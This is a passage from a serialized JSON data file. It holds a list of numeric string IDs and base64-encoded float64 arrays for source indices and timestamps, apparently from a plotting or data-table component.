",\"869\",\"870\",\"871\",\"872\",\"873\",\"874\",\"875\",\"876\",\"877\",\"878\",\"879\",\"880\",\"881\",\"882\",\"883\",\"884\",\"885\",\"886\",\"887\",\"888\",\"899\",\"904\",\"905\",\"916\",\"92\",\"923\",\"932\",\"933\",\"934\",\"935\",\"936\",\"937\",\"938\",\"939\",\"940\",\"941\",\"946\",\"947\",\"948\",\"949\",\"950\",\"951\",\"952\",\"953\",\"954\",\"955\",\"956\",\"957\",\"958\",\"959\",\"960\",\"961\",\"962\",\"963\",\"964\",\"965\",\"966\",\"967\",\"968\",\"969\",\"970\",\"971\",\"972\",\"973\",\"974\",\"975\",\"976\",\"977\",\"978\",\"979\",\"980\",\"981\",\"982\",\"983\",\"984\",\"985\",\"986\",\"987\",\"988\",\"989\",\"990\",\"991\",\"992\",\"993\",\"994\",\"995\",\"996\",\"997\",\"998\",\"999\",\"1003\",\"101\",\"132\",\"176\",\"190\",\"230\",\"339\",\"346\",\"359\",\"382\",\"4\",\"492\",\"497\",\"514\",\"517\",\"535\",\"539\",\"648\",\"667\",\"72\",\"762\",\"777\",\"780\",\"797\",\"897\",\"914\",\"930\",\"1004\",\"10\",\"11\",\"107\",\"108\",\"120\",\"121\",\"127\",\"128\",\"129\",\"130\",\"139\",\"140\",\"15\",\"16\",\"5\",\"6\",\"67\",\"68\",\"76\",\"77\",\"78\",\"79\",\"8\",\"9\",\"1005\",\"12\",\"13\",\"1006\",\"54\",\"55\",\"56\",\"57\",\"58\",\"59\",\"60\",\"1007\",\"103\",\"104\",\"105\",\"106\",\"123\",\"124\",\"134\",\"135\",\"136\",\"137\",\"343\",\"344\",\"349\",\"350\",\"364\",\"365\",\"366\",\"367\",\"385\",\"386\",\"387\",\"388\",\"502\",\"503\",\"504\",\"505\",\"520\",\"521\",\"526\",\"527\",\"530\",\"531\",\"594\",\"595\",\"620\",\"621\",\"640\",\"641\",\"642\",\"643\",\"655\",\"656\",\"657\",\"658\",\"69\",\"70\",\"74\",\"75\",\"756\",\"757\",\"758\",\"759\",\"771\",\"772\",\"773\",\"774\",\"788\",\"789\",\"791\",\"792\",\"793\",\"794\",\"889\",\"890\",\"895\",\"896\",\"910\",\"911\",\"912\",\"913\",\"926\",\"927\",\"928\",\"929\",\"1008\",\"81\",\"82\",\"84\",\"97\",\"99\",\"83\",\"86\",\"88\",\"85\",\"87\",\"93\",\"94\",\"95\",\"96\",\"1009\",\"208\",\"377\",\"89\",\"90\",\"91\",\"98\"],\"source_index_par\":{\"__ndarray__\":\"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AAAAAAA4jEAAAAAAADiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAAJCMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAmIxAAAAAAACYjEAAAAAAAJiMQAAAAAAAOIxAAAAAAAA4jEAAAAAAADiMQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAABwf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAABwgEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAeIBAAAAAAAB4gEAAAAAAAHiAQAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAAAgfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAADB+QAAAAAAAMH5AAAAAAAAwfkAAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAIB/QAAAAAAAgH9AAAAAAACAf0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAOiLQAAAAAAA6ItAAAAAAADoi0AAAAAAAAD4fwAAAAAA+I5AAAAAAAD4jkAAAAAAAPiOQAAAAAAA+I5AAAAAAAD4jkAAAAAAAPiOQAAAAAAAAPh/AAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAADwikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAAD4ikAAAAAAAPiKQAAAAAAA+IpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAqIpAAAAAAACoikAAAAAAAKiKQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAkH5AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAADiHQAAAAAAAAPh/AAAAAAAA+H8AAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAACiEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAAAwhEAAAAAAADCEQAAAAAAAMIRAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAFiBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAALCBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAALiBQAAAAAAAuIFAAAAAAAC4gUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAYIFAAAAAAABggUAAAAAAAGCBQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAiIhAAAAAAACIiEAAAAAAAIiIQAAAAAAAAPh/AAAAAADAeEAAAAAAAMB4QAAAAAAA8HhAAAAAAAAA+H8AAAAAAAD4fwAAAAAAkHZAAAAAAAAA+H8AAAAAAFB6QAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAUHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAGBzQAAAAAAAYHNAAAAAAABgc0AAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAMHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAABAdkAAAAAAAEB2QAAAAAAAQHZAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAADAckAAAAAAAMByQAAAAAAAwHJAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAPiNQAAAAAAAAPh/AAAAAAAA+H8AAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAGiCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABwgkAAAAAAAHCCQAAAAAAAcIJAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAHBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAgHBAAAAAAACAcEAAAAAAAIBwQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAQGhAAAAAAABAaEAAAAAAAEBoQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAAEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAAE5AAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACAS0AAAAAAAIBLQAAAAAAAgFFAAAAAAACAS0AAAAAAAIBLQAAAAAAAgEtAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAEBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgFVAAAAAAACAVUAAAAAAAIBVQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAgEZAAAAAAACARkAAAAAAAIBGQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAwF1AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAACAYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAKBhQAAAAAAAoGFAAAAAAACgYUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAA5QAAAAAAAADlAAAAAAAAAOUAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAwj0AAAAAAAAD4fwAAAAAAaIdAAAAAAAAA+H8AAAAAAJiLQAAAAAAAAPh/AAAAAAAogUAAAAAAAAD4fwAAAAAA4H1AAAAAAAAA+H8AAAAAAEiBQAAAAAAAAPh/AAAAAACAikAAAAAAAAD4fwAAAAAAkIpAAAAAAAAA+H8AAAAAAMCOQAAAAAAAAPh/AAAAAAAQh0AAAAAAAAD4fwAAAAAAAIdAAAAAAAAA+H8AAAAAALiLQAAAAAAAAPh/AAAAAAAA+H8AAAAAALiNQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAADQjkAAAAAAANCOQAAAAAAA4I5AAAAAAAAA+H8AAAAAANCIQAAAAAAAAPh/AAAAAADgf0AAAAAAAOB/QAAAAAAAOIFAAAAAAAAA+H8AAAAAAMiFQAAAAAAAyIVAAAAAAADAhkAAAAAAAAD4fwAAAAAAAH1AAAAAAAAAfUAAAAAAADCAQAAAAAAAAPh/AAAAAACgg0AAAAAAAKCDQAAAAAAASIVAAAAAAAAA+H8AAAAAAFB3QAAAAAAAUHdAAAAAAABQeEAAAAAAAAD4fwAAAAAAAHtAAAAAAAAAe0AAAAAAAOB6QAAAAAAAAPh/AAAAAACwd0AAAAAAAAD4fwAAAAAAIHJAAAAAAAAgckAAAAAAAHB8QAAAAAAAAPh/AAAAAAAwe0AAAAAAADB7QAAAAAAAsH5AAAAAAAAA+H8AAAAAAKBnQAAAAAAAoGdAAAAAAACAekAAAAAAAAD4fwAAAAAAyI1AAAAAAADIjUAAAAAAABiKQAAAAAAAAPh/AAAAAADgcUAAAAAAAOBxQAAAAAAAwHFAAAAAAAAA+H8AAAAAAOBvQAAAAAAA4G9AAAAAAADgY0AAAAAAAAD4fwAAAAAAIGRAAAAAAAAA+H8AAAAAAEBaQAAAAAAAQFpAAAAAAACAbEAAAAAAAAD4fwAAAAAAwFlAAAAAAADAWUAAAAAAAOBnQAAAAAAAAPh/AAAAAABAXEAAAAAAAEBcQAAAAAAAQF1AAAAAAAAA+H8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAX0AAAAAAAAD4fwAAAAAAAPh/AAAAAAB4h0AAAAAAAHiHQAAAAAAAkIdAAAAAAAD4h0AAAAAAAAD4fwAAAAAAiIdAAAAAAACIh0AAAAAAAAD4fwAAAAAAmIdAAAAAAAAA+H8AAAAAAAD4fwAAAAAA4IdAAAAAAADgh0AAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAuIdAAAAAAADAh0AAAAAAAAD4fw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1010]},\"timestamp_orig_par\":{\"__ndarray__\":\"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